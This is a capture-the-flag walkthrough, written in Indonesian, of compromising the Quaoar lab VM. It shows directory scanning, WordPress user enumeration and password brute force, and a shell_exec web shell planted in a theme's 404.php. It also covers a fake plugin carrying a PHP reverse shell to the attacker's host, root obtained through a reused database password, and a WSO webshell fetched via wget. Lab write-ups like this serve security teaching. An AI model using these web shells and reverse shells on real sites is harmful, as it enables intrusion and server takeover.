+ http://192.168.0.122/upload/modules/news/modify (CODE:403|SIZE:85)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/rss (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/modules/news/search (CODE:403|SIZE:85)                                                                                                                                                             
==> DIRECTORY: http://192.168.0.122/upload/modules/news/templates/                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/uninstall (CODE:403|SIZE:88)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/news/upgrade (CODE:403|SIZE:86)                                                                                                                                                            
+ http://192.168.0.122/upload/modules/news/view (CODE:403|SIZE:83)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/ ----
+ http://192.168.0.122/upload/modules/wysiwyg/add (CODE:403|SIZE:85)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/wysiwyg/delete (CODE:403|SIZE:88)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/wysiwyg/icon (CODE:200|SIZE:1058)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/wysiwyg/index (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/index.php (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/modules/wysiwyg/info (CODE:403|SIZE:86)                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/info.php (CODE:403|SIZE:86)                                                                                                                                                        
+ http://192.168.0.122/upload/modules/wysiwyg/install (CODE:403|SIZE:89)                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/languages/                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/modify (CODE:403|SIZE:88)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/wysiwyg/save (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/wysiwyg/search (CODE:403|SIZE:88)                                                                                                                                                          
==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/templates/                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/upgrade (CODE:403|SIZE:89)                                                                                                                                                         
+ http://192.168.0.122/upload/modules/wysiwyg/view (CODE:403|SIZE:86)                                                                                                                                                            
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/page/posts/ ----
+ http://192.168.0.122/upload/page/posts/index (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/page/posts/index.php (CODE:302|SIZE:0)                                                                                                                                                             
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/temp/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/templates/blank/ ----
+ http://192.168.0.122/upload/templates/blank/index (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/templates/blank/index.php (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/templates/blank/info (CODE:403|SIZE:86)                                                                                                                                                            
+ http://192.168.0.122/upload/templates/blank/info.php (CODE:403|SIZE:86)                                                                                                                                                        
+ http://192.168.0.122/upload/templates/blank/preview (CODE:200|SIZE:1377)                                                                                                                                                       
+ http://192.168.0.122/upload/templates/blank/template (CODE:200|SIZE:507)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/network/ ----
+ http://192.168.0.122/wordpress/wp-admin/network/about (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/admin (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-admin/network/credits (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/edit (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/wordpress/wp-admin/network/index (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-admin/network/menu (CODE:500|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/wordpress/wp-admin/network/plugins (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/profile (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/settings (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/wordpress/wp-admin/network/setup (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/sites (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/themes (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/network/update (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/network/upgrade (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/users (CODE:302|SIZE:0)                                                                                                                                                        
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/user/ ----
+ http://192.168.0.122/wordpress/wp-admin/user/about (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/user/admin (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/user/credits (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/wordpress/wp-admin/user/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/user/menu (CODE:500|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/user/profile (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/plugins/ ----
+ http://192.168.0.122/wordpress/wp-content/plugins/hello (CODE:500|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-content/plugins/index (CODE:200|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                                                                  
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/themes/ ----
+ http://192.168.0.122/wordpress/wp-content/themes/index (CODE:200|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                                                                   
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/login/forgot/ ----
+ http://192.168.0.122/upload/admins/login/forgot/index (CODE:200|SIZE:2531)                                                                                                                                                     
+ http://192.168.0.122/upload/admins/login/forgot/index.php (CODE:200|SIZE:2531)                                                                                                                                                 
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/yui/event/ ----
+ http://192.168.0.122/upload/include/yui/event/event (CODE:200|SIZE:87537)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/event/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/include/yui/event/index.php (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/event/README (CODE:200|SIZE:9807)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/yui/yahoo/ ----
+ http://192.168.0.122/upload/include/yui/yahoo/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/include/yui/yahoo/index.php (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/yahoo/README (CODE:200|SIZE:2889)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/yahoo/yahoo (CODE:200|SIZE:35223)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/css/ ----
+ http://192.168.0.122/upload/modules/news/css/backend (CODE:200|SIZE:1416)                                                                                                                                                      
+ http://192.168.0.122/upload/modules/news/css/frontend (CODE:200|SIZE:1771)                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/css/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/modules/news/css/index.php (CODE:302|SIZE:0)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/languages/ ----
+ http://192.168.0.122/upload/modules/news/languages/index (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/languages/index.php (CODE:302|SIZE:0)                                                                                                                                                 
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/templates/ ----
==> DIRECTORY: http://192.168.0.122/upload/modules/news/templates/backend/                                                                                                                                                       
+ http://192.168.0.122/upload/modules/news/templates/index (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                 
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/languages/ ----
+ http://192.168.0.122/upload/modules/wysiwyg/languages/index (CODE:302|SIZE:0)                                                                                                                                                  
+ http://192.168.0.122/upload/modules/wysiwyg/languages/index.php (CODE:302|SIZE:0)                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/templates/ ----
+ http://192.168.0.122/upload/modules/wysiwyg/templates/index (CODE:302|SIZE:0)                                                                                                                                                  
+ http://192.168.0.122/upload/modules/wysiwyg/templates/index.php (CODE:302|SIZE:0)                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/templates/backend/ ----
+ http://192.168.0.122/upload/modules/news/templates/backend/index (CODE:302|SIZE:0)                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/templates/backend/index.php (CODE:302|SIZE:0)                                                                                                                                         
                                                                                                                                                                                                                                 
-----------------
END_TIME: Mon Jan 23 21:35:16 2023
DOWNLOADED: 258272 - FOUND: 252

Coba, 

dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w

Hasilny tidak beda jauh dengan sebelumnya.

Sepertinya ada CMS (Lepton CMS) yang mengintai target ini. Disini bisa dilihat terdapat 3 file/folder penting yaitu 

/upload
/wordpress
/robots.txt

Akses robot.txt di URL 

http://192.168.0.122/robots.txt

keluar tulisan, 

Disallow: Hackers
Allow: /wordpress/
   ____                              
#  /___ \_   _  __ _  ___   __ _ _ __ 
# //  / / | | |/ _` |/ _ \ / _` | '__|
#/ \_/ /| |_| | (_| | (_) | (_| | |   
#\___,_\ \__,_|\__,_|\___/ \__,_|_|

Akses /upload 

http://192.168.0.122/upload/

Ada LEPTON CMS, tapi sulit untuk diakses karena menggunakan IP 192.168.0.190. Tampaknya kita lebih baik focus ke wordpress saja.

Wordpress Scanning

Scan Wordpress, 

wpscan --url http://192.168.0.122/wordpress --enumerate u

hasilnya, 

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|  

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.122/wordpress/ [192.168.0.122]
[+] Started: Mon Jan 23 21:45:40 2023  

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.2.22 (Ubuntu)
 |  - X-Powered-By: PHP/5.3.10-1ubuntu3
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.122/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ 

[+] WordPress readme found: http://192.168.0.122/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.122/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.122/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299 

[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.0.122/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
 |  - http://192.168.0.122/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>  

[+] WordPress theme in use: twentyfourteen
 | Location: http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | [!] The version is out of date, the latest version is 3.5
 | Style URL: http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
 | Style Name: Twenty Fourteen
 | Style URI: http://wordpress.org/themes/twentyfourteen
 | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
 | Author: the WordPress team
 | Author URI: http://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14, Match: 'Version: 1.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 
<====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wpuser
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register 

[+] Finished: Mon Jan 23 21:45:46 2023
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 15.813 KB
[+] Data Received: 231.31 KB
[+] Memory used: 186.273 MB
[+] Elapsed time: 00:00:05


Yang di temukan, 

What	                Fact
/readme.html	        WordPress version 3.9.14
/wp-content/uploads/	Upload directory has directory listing enabled

Di temukan user, 

Id	Login	Name
1	admin	admin
2	wpuser	wpuser

Wordpress Bruteforce password

Coba bruteforce, 

wpscan --url http://192.168.0.122/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames admin -t 50

setelah beberapa lama, hasilnya, 

.........

[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - admin / admin                                                                                                                                                                                                         
All Found                                                                                                                                                                                                                         
Progress Time: 00:01:41 <                                                                                                                                                                     
> (40 / 28688)  0.13%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: admin

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 23 21:55:08 2023
[+] Requests Done: 185
[+] Cached Requests: 39
[+] Data Sent: 52.958 KB
[+] Data Received: 4.135 MB
[+] Memory used: 338.531 MB
[+] Elapsed time: 00:01:58

Tampaknya 

username admin
password admin

Inject cmd vulnerability

Coba login ke 

http://192.168.0.122/wordpress/wp-login.php

Masuk ke 

Appearance > Editor > 404 Template (404.php)

Masukan 

<?php
/**
 * The template for displaying 404 pages (Not Found)
 *
 * @package WordPress
 * @subpackage Twenty_Fourteen
 * @since Twenty Fourteen 1.0
 */

echo "

";
 echo shell_exec($_GET['cmd']);
 echo "

"; 

exit();

get_header(); ?>

Jangan lupa di Save setelah di tambahkan. Lakukan command injection lewat URL, 

http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd;%20ls%20-lah;%20id

Jika berhasil akan keluar, 

/var/www/wordpress/wp-content/themes/twentyfourteen
total 864K
drwxr-xr-x 9 www-data www-data 4.0K Oct 12  2016 .
drwxr-xr-x 5 www-data www-data 4.0K Oct 16  2016 ..
-rw-r--r-- 1 www-data www-data  823 Jan 23 22:30 404.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 archive.php
-rw-r--r-- 1 www-data www-data 1.9K Oct 12  2016 author.php
-rw-r--r-- 1 www-data www-data 1.5K Oct 12  2016 category.php
-rw-r--r-- 1 www-data www-data 2.3K Oct 12  2016 comments.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-aside.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-audio.php
-rw-r--r-- 1 www-data www-data 1.1K Oct 12  2016 content-featured-post.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-gallery.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-image.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-link.php
-rw-r--r-- 1 www-data www-data  961 Oct 12  2016 content-none.php
-rw-r--r-- 1 www-data www-data  871 Oct 12  2016 content-page.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-quote.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-video.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 css
-rw-r--r-- 1 www-data www-data  946 Oct 12  2016 featured-content.php
-rw-r--r-- 1 www-data www-data  728 Oct 12  2016 footer.php
-rw-r--r-- 1 www-data www-data  16K Oct 12  2016 functions.php
drwxr-xr-x 3 www-data www-data 4.0K Oct 12  2016 genericons
-rw-r--r-- 1 www-data www-data 2.3K Oct 12  2016 header.php
-rw-r--r-- 1 www-data www-data 2.6K Oct 12  2016 image.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 images
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 inc
-rw-r--r-- 1 www-data www-data 1.6K Oct 12  2016 index.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 js
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 languages
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 page-templates
-rw-r--r-- 1 www-data www-data 1.2K Oct 12  2016 page.php
-rw-r--r-- 1 www-data www-data  16K Oct 12  2016 rtl.css
-rw-r--r-- 1 www-data www-data 603K Oct 12  2016 screenshot.png
-rw-r--r-- 1 www-data www-data 1.3K Oct 12  2016 search.php
-rw-r--r-- 1 www-data www-data  340 Oct 12  2016 sidebar-content.php
-rw-r--r-- 1 www-data www-data  395 Oct 12  2016 sidebar-footer.php
-rw-r--r-- 1 www-data www-data  848 Oct 12  2016 sidebar.php
-rw-r--r-- 1 www-data www-data 1.1K Oct 12  2016 single.php
-rw-r--r-- 1 www-data www-data  74K Oct 12  2016 style.css
-rw-r--r-- 1 www-data www-data 1.6K Oct 12  2016 tag.php
-rw-r--r-- 1 www-data www-data 2.4K Oct 12  2016 taxonomy-post_format.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Alternative Inject Fake Plugin

Di Kali Linux 

cd ~
cp /usr/share/webshells/php/php-reverse-shell.php ~/shelly.php

Beri plugin wrapper 

<?php
 
/*
Plugin Name: Shelly
Plugin URI: http://localhost  
Description: Bla Bla Bla  
Author: Pingmoose
Version: 1.0.1  
Author URI: http://localhost  
*/
 
COPY CONTENTS OF shelly.php HERE
 
?>


Masuk ke shell Kali, cek IP address 

ifconfig eth0

Misalnya, IP address 192.168.0.94 Edit shelly shell ubah, 

$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

Menjadi 

$ip = '192.168.0.94';  // CHANGE THIS
$port = 4444;       // CHANGE THIS


Zip, 

zip shelly-plugin.zip shelly.php
mv shelly-plugin.zip /home/kali 
chmod -Rf 777 /home/kali/shelly-plugin.zip 
chown kali: /home/kali/shelly-plugin.zip

Masuk ke 

http://192.168.0.122/wordpress/wp-admin/plugins.php

Upload, JANGAN di aktifkan

Start netcat listener di Kali

Start 4444 listener 

nc -nvlp 4444

Aktifkan shelly shell 

http://192.168.0.122/wordpress/wp-content/plugins/shelly-plugin/shelly.php

Di kali linux CLI akan ada kata2, 

nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.0.94] from (UNKNOWN) [192.168.0.122] 48071
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
 21:23:43 up  1:10,  0 users,  load average: 0.00, 0.01, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Akses shell yang lebih dalam, 

$ whoami
www-data
$ whereis python 
python: /usr/bin/python2.7 /usr/bin/python /etc/python2.7 /etc/python /usr/lib/python2.7 /usr/local/lib/python2.7 /usr/include/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Quaoar:/$

Dapatkan flag yang pertama, 

www-data@Quaoar:/$ cd /home     
cd /home
www-data@Quaoar:/home$ ls
ls
wpadmin
www-data@Quaoar:/home$ cat wpadmin
cat wpadmin
cat: wpadmin: Is a directory
www-data@Quaoar:/home$ cd wpadmin
cd wpadmin
www-data@Quaoar:/home/wpadmin$ ls
ls
flag.txt
www-data@Quaoar:/home/wpadmin$ cat flag.txt
cat flag.txt
2bafe61f03117ac66a73c3c514de796e
www-data@Quaoar:/home/wpadmin$


Berburu Flag 2: Root

Cek, 

cd /
find / -perm -4000 -user root 2> /dev/null

Tampaknya tidak ada yang terlalu menarik. Cek wp-config.php, 

cat /var/www/wordpress/wp-config.php

Hasilnya, 

.....
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', );
.....

DB_PASSWORD rootpassword! - Keren! Jajal, 

ww-data@Quaoar:/$ su
su
Password: rootpassword!
root@Quaoar:/#

Masuk :) .. Root Flag 

root@Quaoar:/# cd /root
cd /root
root@Quaoar:~# ls -al
ls -al
total 48
drwx------  6 root root 4096 Nov 30  2016 .
drwxr-xr-x 22 root root 4096 Oct  7  2016 ..
drwx------  2 root root 4096 Oct  7  2016 .aptitude
-rw-------  1 root root  410 Jan 24 04:38 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Oct 15  2016 .cache
----------  1 root root   33 Oct 22  2016 flag.txt
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4096 Oct 26  2016 .ssh
-rw-------  1 root root 4740 Nov 30  2016 .viminfo
drwxr-xr-x  8 root root 4096 Jan 29  2015 vmware-tools-distrib
root@Quaoar:~# cat flag.txt
cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
root@Quaoar:~#

Flag root adalah 

8e3f9ec016e3598c5eec11fd3d73f6fb

Berburu Flag 3: Root

Cek /etc Tampaknya /etc/cron.d/php5 menarik, Lakukan, 

root@Quaoar:~# cd /etc 
cd /etc
root@Quaoar:/etc# ls *cron*
ls *cron*
crontab

cron.d:
php5

cron.daily:
apache2   bsdmainutils  man-db              samba
apport    dpkg          mlocate             standard
apt       libvirt-bin   passwd              tomcat6
aptitude  logrotate     popularity-contest  update-notifier-common

cron.hourly:

cron.monthly:

cron.weekly:
apt-xapian-index  man-db
root@Quaoar:/etc# cat cron.d/php5
cat cron.d/php5
# /etc/cron.d/php5: crontab fragment for php5
#  This purges session files older than X, where X is defined in seconds
#  as the largest value of session.gc_maxlifetime from all your php.ini
#  files, or 24 minutes if not defined.  See /usr/lib/php5/maxlifetime
# Its always a good idea to check for crontab to learn more about the operating 
system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de
# Look for and purge old sessions every 30 minutes
09,39 *     * * *     root   [ -x /usr/lib/php5/maxlifetime ] && [ -d 
/var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete
root@Quaoar:/etc#

Flag Root adalah, 

d46795f84148fd338603d0d6a9dbf8de



Beberapa Catatan Percobaan Sebelumnya

Percobaan Privilege Escalation (getting root)

cara-cara di atas semua tidak berhasil. Terpaksa menggunakan bruteforce. 

http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=ls%20/var/www/wordpress
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20/var/www/wordpress/wp-config.php



Karena saya tidak menemukan jalan lain selain bruteforce, namun tentunya pusing juga kalau bruteforce rootnya karena /etc/shadow tidak dapat dibuka.

Akhirnya saya coba iseng melihat konfigurasi wordpress, siapa tau password rootnya adalah password database server 

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');

Lalu saya cobakan saja password rootpassword! pada root


Okay! berhasil sudah sampai disini, yey!!!

Epilogue Terus terang aja sih, ini VM sebenarnya gampang cuma malesinnya adalah maenan bruteforce dan tebak password.

Tentunya walaupun mudah, ini juga merupakan hal yang sulit buat kalian yang masih baru dalam dunia hacking. Tebak password itu bisa gw bilang salah satu “skill dewa” karena kamu harus punya sense yang bagus untuk itu.

Paling segitu dulu saja, stay tuned untuk artikel lainnya yah! :D

Referensi



Percoban Menggunakan WSO Webshell

Upload WSO Shell

Download WSO 

cd /home/kali/Downloads/
wget https://github.com/mIcHyAmRaNe/wso-webshell/archive/refs/heads/master.zip
unzip master.zip
mv wso-webshell-master/wso.php .                                                                                                                                                                                                                    
mv wso.php wso.txt

Default setting WSO Shell ini 

Password   ghost287            Edit line 7 (md5 hash)
Email      test@testmail.com   Edit line 4

File wso.txt ada di /home/kali/Downloads/ Jalankan web server di Kali linux 

python3 -m http.server --bind 0.0.0.0 9000

Cek IP address kali linux 

ifconfig

Misalnya IP address 192.168.0.62, cek apakah bisa di akses via web alamat 

http://192.168.0.62:9000/
http://192.168.0.62:9000/wso.txt

Upload menggunakan exploit, 

http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=wget%20http://192.168.0.62:9000/wso.txt
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv%20wso.txt%20wso.php
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=ls%20-la

Coba WSO Shell

Jalankan Remote Shell WSO Shell 

